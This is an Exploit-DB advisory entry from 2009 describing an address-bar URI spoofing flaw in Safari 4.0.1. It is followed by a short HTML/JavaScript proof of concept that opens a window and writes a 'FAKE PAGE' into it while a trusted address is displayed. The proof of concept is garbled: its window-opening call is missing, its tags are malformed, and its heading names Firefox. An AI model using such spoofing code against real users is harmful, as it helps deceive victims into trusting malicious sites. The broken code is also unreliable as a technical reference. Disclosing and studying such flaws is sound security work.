Apple Safari 4.0.1 Error Page Address Bar URI Spoofing Vulnerability

ID EDB-ID:33118
Type exploitdb
Reporter Juan Pablo Lopez Yacubian
Modified 2009-06-27T00:00:00


Apple Safari 4.0.1 Error Page Address Bar URI Spoofing Vulnerability. Remote exploits for multiple platform


Apple Safari is affected by a URI-spoofing vulnerability.

An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.

Safari 4.0.1 is affected; other versions may also be vulnerable.

This issue is similar to the vulnerability discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability). 

</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a =",") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian